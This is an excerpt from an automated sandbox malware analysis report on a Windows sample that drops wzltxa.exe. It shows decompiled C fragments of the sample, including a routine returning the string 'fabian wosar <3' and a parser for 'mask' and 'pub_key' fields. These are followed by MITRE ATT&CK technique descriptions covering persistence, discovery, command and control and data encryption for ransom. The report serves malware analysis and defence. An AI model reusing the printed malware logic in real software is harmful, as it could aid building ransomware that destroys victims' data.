								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0FBB51ED), ref: 0FBB4F0D
lstrlenA.KERNEL32(00000000,?,0FBB51ED), ref: 0FBB4F67
lstrcpyA.KERNEL32(?,?,?,0FBB51ED), ref: 0FBB4F98

Strings

fabian wosar <3, xrefs: 0FBB4F05

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: b6c75d01057a5f9e9695e4c65d9482ce97462a60a8d0ad1c44089c837695ae87
Instruction ID: ac625807feb06de1cae0160564d3b329321be999bdb82a21801160ecf1fa8b7e
Opcode Fuzzy Hash: b6c75d01057a5f9e9695e4c65d9482ce97462a60a8d0ad1c44089c837695ae87
Instruction Fuzzy Hash: DD31F0218081A5DADB26CE7878103FABFA6FF43103B9851DDD8D99B207D6E16446CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

APIs

lstrcmpiA.KERNEL32(0FBB5444,mask,0FBB5445,?,?,0FBB3441,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB31B9
lstrcmpiA.KERNEL32(0FBB5444,pub_key,?,0FBB3441,0FBB5445,00000000,00000000,00000000,?,?,0FBB5444,00000000), ref: 0FBB31D1

Strings

mask, xrefs: 0FBB31B1
pub_key, xrefs: 0FBB31BF

Memory Dump Source

Source File: 0000000C.00000002.344600044.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000C.00000002.344594887.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.344622726.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: d5f7da704fd501c6fc1b95edf96a1195f82c8e867d7cb0375121e721e8b2a087
Instruction ID: 7a20cc59a8a578519bb4d5306848b4df3a8c9cd7d956540fb61ecd3742abd83f
Opcode Fuzzy Hash: d5f7da704fd501c6fc1b95edf96a1195f82c8e867d7cb0375121e721e8b2a087
Instruction Fuzzy Hash: 31F046723082841EE7194AACBC857F1BBCCDB05310F8800BFFA89C2152D2FA9882CB50

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mPNVrHIpyt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Windows Analysis Report
mPNVrHIpyt.exe

Function 0F697490 Relevance: 142.2, APIs: 55, Strings: 26, Instructions: 499
memorystringregistryCOMMON

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre